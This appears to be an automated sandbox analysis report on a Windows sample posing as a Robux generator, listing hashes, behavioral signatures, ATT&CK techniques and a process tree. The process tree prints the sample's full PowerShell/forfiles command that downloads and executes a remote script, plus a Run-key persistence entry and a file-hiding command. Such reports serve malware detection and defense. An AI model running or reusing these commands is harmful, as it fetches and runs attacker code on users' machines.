Analysis
-
max time kernel
208s -
max time network
196s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05/08/2024, 17:08
Static task
static1
Behavioral task
behavioral1
Sample
robuxgeneratorapp.exe
Resource
win10v2004-20240802-en
General
-
Target
robuxgeneratorapp.exe
-
Size
7.0MB
-
MD5
cd7f96aa5c48273581e22aaabfc7167e
-
SHA1
2e350a557878c59a93a1abf13b7bf2307fa21a78
-
SHA256
acdf56cd54e954f2a876520fbb1ac715a56176a5aa0815bfa19713d8f535043b
-
SHA512
ede9a99cd87485a0235c15afee1e63e0ecfb4c62c9a84e3cf5fe6cbe721877838c1135c0c9401432d6725b8f9ba35b7e6b41fa75d51baf96d825bc05ee654e87
-
SSDEEP
98304:ksa9wrXfr7GposZExhblaYQ91V/BbH6bGw0EukKou1+P:ha0fr7Gr6xip1VZtw0EHKFU
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 37 2816 powershell.exe 38 2816 powershell.exe 49 2816 powershell.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1228 attrib.exe -
Indirect Command Execution 1 TTPs 2 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 3308 powershell.exe 3584 forfiles.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync = "odbcconf.exe /a {REGSVR OneDriveFileSync}" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 1 raw.githubusercontent.com 2 raw.githubusercontent.com 38 raw.githubusercontent.com 48 discord.com 49 discord.com -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings taskmgr.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3096 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 3308 powershell.exe 3308 powershell.exe 2816 powershell.exe 2816 powershell.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 408 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 864 msedge.exe 864 msedge.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 3764 taskmgr.exe Token: SeSystemProfilePrivilege 3764 taskmgr.exe Token: SeCreateGlobalPrivilege 3764 taskmgr.exe Token: 33 3764 taskmgr.exe Token: SeIncBasePriorityPrivilege 3764 taskmgr.exe Token: SeDebugPrivilege 408 taskmgr.exe Token: SeSystemProfilePrivilege 408 taskmgr.exe Token: SeCreateGlobalPrivilege 408 taskmgr.exe Token: SeDebugPrivilege 3308 powershell.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeSecurityPrivilege 408 taskmgr.exe Token: SeTakeOwnershipPrivilege 408 taskmgr.exe Token: SeSecurityPrivilege 408 taskmgr.exe Token: SeTakeOwnershipPrivilege 408 taskmgr.exe Token: SeBackupPrivilege 4296 svchost.exe Token: SeRestorePrivilege 4296 svchost.exe Token: SeSecurityPrivilege 4296 svchost.exe Token: SeTakeOwnershipPrivilege 4296 svchost.exe Token: 35 4296 svchost.exe Token: 33 408 taskmgr.exe Token: SeIncBasePriorityPrivilege 408 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 4656 robuxgeneratorapp.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 3764 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe 408 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4656 wrote to memory of 3308 4656 robuxgeneratorapp.exe 93 PID 4656 wrote to memory of 3308 4656 robuxgeneratorapp.exe 93 PID 3308 wrote to memory of 3584 3308 powershell.exe 95 PID 3308 wrote to memory of 3584 3308 powershell.exe 95 PID 3584 wrote to memory of 2816 3584 forfiles.exe 96 PID 3584 wrote to memory of 2816 3584 forfiles.exe 96 PID 2816 wrote to memory of 752 2816 powershell.exe 97 PID 2816 wrote to memory of 752 2816 powershell.exe 97 PID 752 wrote to memory of 4660 752 csc.exe 98 PID 752 wrote to memory of 4660 752 csc.exe 98 PID 2816 wrote to memory of 1228 2816 powershell.exe 101 PID 2816 wrote to memory of 1228 2816 powershell.exe 101 PID 864 wrote to memory of 2872 864 msedge.exe 108 PID 864 wrote to memory of 2872 864 msedge.exe 108 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 4272 864 msedge.exe 109 PID 864 wrote to memory of 3896 864 msedge.exe 110 PID 864 wrote to memory of 3896 864 msedge.exe 110 PID 864 wrote to memory of 3500 864 msedge.exe 111 PID 864 wrote to memory of 3500 864 msedge.exe 111 PID 864 wrote to memory of 3500 864 msedge.exe 111 PID 864 wrote to memory of 3500 864 msedge.exe 111 PID 864 wrote to memory of 3500 864 msedge.exe 111 PID 864 wrote to memory of 3500 864 msedge.exe 111 PID 864 wrote to memory of 3500 864 msedge.exe 111 PID 864 wrote to memory of 3500 864 msedge.exe 111 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1228 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\robuxgeneratorapp.exe"C:\Users\Admin\AppData\Local\Temp\robuxgeneratorapp.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" forfiles.exe /p c:\windows\system32 /m notepad.exe /c 'powershell.exe -command sal notpad iex; sal windows_nt iwr; iex(iwr tinyurl.com/2jcsd7db -usebasicparsing)'2⤵
- Indirect Command Execution
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3308 -
C:\Windows\system32\forfiles.exe"C:\Windows\system32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command sal notpad iex; sal windows_nt iwr; iex(iwr tinyurl.com/2jcsd7db -usebasicparsing)"3⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-command sal notpad iex; sal windows_nt iwr; iex(iwr tinyurl.com/2jcsd7db -usebasicparsing)4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gro4oitd\gro4oitd.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES65F8.tmp" "c:\Users\Admin\AppData\Local\Temp\gro4oitd\CSCC8B9B9615ECB4A51B8145BA91E255E0.TMP"6⤵PID:4660
-
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +s +h C:\Users\Admin\AppData\Local\Temp\OneDriveFileSync.dll5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1228
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3764
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5116
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\jawshtml.html1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff874fb46f8,0x7ff874fb4708,0x7ff874fb47182⤵PID:2872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:22⤵PID:4272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:32⤵PID:3896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:82⤵PID:3500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:12⤵PID:1460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:12⤵PID:3716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:82⤵PID:5076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,6845089720473406439,14119195799417614956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:82⤵PID:1188
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4720
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:180
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\jusched.log1⤵
- Opens file in notepad (likely ransom note)
PID:3096
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Indirect Command Execution
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
3KB
MD55a7506c517bce099f84be749f2b15934
SHA1b23512c8d3c6d3e1722ac4098f84702d64abb305
SHA256c881f4b505d483e62691e7d378de625078f52936f68a0c4a8122bd8e0531e4e0
SHA51273bc375231a6ae02dadc38199b4114c4da194f8cd71919b2a44002ae0be2cd42b6c54957ad5cab832464e96606778d1284c4bb41457322d91fc0ddfe84e5d431
-
Filesize
152B
MD5ff63763eedb406987ced076e36ec9acf
SHA116365aa97cd1a115412f8ae436d5d4e9be5f7b5d
SHA2568f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c
SHA512ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f
-
Filesize
152B
MD52783c40400a8912a79cfd383da731086
SHA1001a131fe399c30973089e18358818090ca81789
SHA256331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5
SHA512b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685
-
Filesize
6KB
MD50289a9d6a2c7f97da923deb7202fa5af
SHA1ca91dc83455c1f5e842349aa0a7abaa9c7d78a3b
SHA25632d97a8be310c0ca326a6a36885da1c6a401335f77098c3dab983c492e6535fc
SHA5124d7090c37468c41ac55e8648fd4854df2d74be06fac6d2bfa7b178cda8948ced8a436caa371ab68d1eec90fdba04e7876ddee4e97e6b5f3e00174de78161a6e9
-
Filesize
6KB
MD5d1b070515c9429a2e0c2022cbb5134d6
SHA1160d8f09339446bb6eedca6bde37669e909975f2
SHA2562163477bb85a131375184079366b1dc6ea4ad32a97998d9f21b04c27466106de
SHA512e6e7b9cc03dda43d0a52ecfdcb4ce6f2c30d678b1506e83a9d6717e9db867b94d0fd73ca8b3f9a7989ec3b31516ee5c9b02e7c92a109c4177089bdfea6a1f478
-
Filesize
6KB
MD596f72dfc2ba38691aa9653f77e49e32c
SHA1536d639c17f1b60f08209fb76a0cb099d07fcc27
SHA256970f0a67564d8f0155a42d504a38f7f8f38e2d4f5c1c280309cb9a4118224f46
SHA51202d95a46f40d0ac5376d490e7c622c14c5672b175f2b2f8438472554e38cdbd82bcc502cd6b641ad389d0e6cf55c8d12ec4811bcb8832151131f07099709f493
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5ff0b35aafe7ca1f0f71382a4235e9f64
SHA126612530d7935c230186f6540fbfac36fb8eb385
SHA25617b6731a82052e14addf195772c69e6789ccba0a938683c6b1b293c29111a4d5
SHA512d59982c44ef45b45ab2cd2ba654f5ab0909c19f2271c283cbdca31a5f4e22edfef7c971238c8a278f5585741d985f3e3b6f2c3a3860e3a837da2e99cbe4ba6ce
-
Filesize
11KB
MD5e71abf87c21d87c8a13af5c1ce8f781c
SHA115fe8d985f7cdc7d82772d2522f0ee0d46fc9598
SHA256c16ed1b8ad122a44eeff3849814638a243bca2c4139b8b47d12316d8fdb75f57
SHA5121f7e4bbab4c227c86d8dc1952a7583fc58892a641f2d817ca77ec7fd45aab5d79aa9dae605274f9fc5368528502601b88ad3b9e06d63d4812811288e68bc6d7a
-
Filesize
11KB
MD544d58b18bd93b2fb3ce4f69ccaad1503
SHA1bcf38587541f408f20adc04e01b11a3a824f405d
SHA25603c8b8684eddf319b7f4f5017bed1fe2787cdc4408f520bf3352b4a2ace35fdb
SHA5126a74dc3b2de8f1d4b1b24b75a3231ec82646036caf22a6ad1bc1160d9d3fa3ba15b7db09df871fa78e25d968849055f1f8da813e6e1465546bb3d61c30b9d990
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
Filesize
109KB
MD56af2e1e48809d2a78b6226909095c4b7
SHA1ab71e5dbed15caa497a5082eb1c1322743863ba7
SHA256254ccbd438ec070539f848cafacc2f98c16dc42afe3ce5297ea0b3d34df7be72
SHA512e6c42e52f3b393cb9f1cbcd60305e89bb5e4df2fe7a3235fc2cfff4d5601a89185d03db407ca385bf7ce690e15a9a16715ca9deaedf249b68e5bb142af7e0d03
-
Filesize
1KB
MD5b48d615cee545cd4efc4c25839109c11
SHA17f2a2abb51e39bceec8368ee0a80f627dffbab38
SHA25649df01f63f443cd9bfb5adc0298f9c4014ca13dd35c758f7264e03ba5e52531b
SHA51207eb207696217de037c0158086327fee81ec12085566c69640ee73725a70cf6f093d01580e8edbbe1b4e17a969a1020f7bcab3c46c83675ae55ae9bfec1a714c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5c6a4503e62232e855929196924c63e89
SHA119dc3b285ce9815ab9aae240015b1661cde52bfe
SHA256e09f424945b4a7b8726d3e74c9c02062629edf34677eafa37888f32d16700d76
SHA512f29905c5e6a7298a6b56e1334b5a1a0e1b329b8e5c46119b82dd683e389849e5f9ec69988c06cb95cb2d211d6be88879003c3d9443bc3f96ea1a3c3e318755b2
-
Filesize
652B
MD59835dcaace28f8804aab41f480aa33e6
SHA1885e4cf49e88d8a816a4cc6c4abf30cd9d276444
SHA256a421121718ddc7b2d90528e6b85f9965b4d9ce5137bc5a88ba2c502d93d208b6
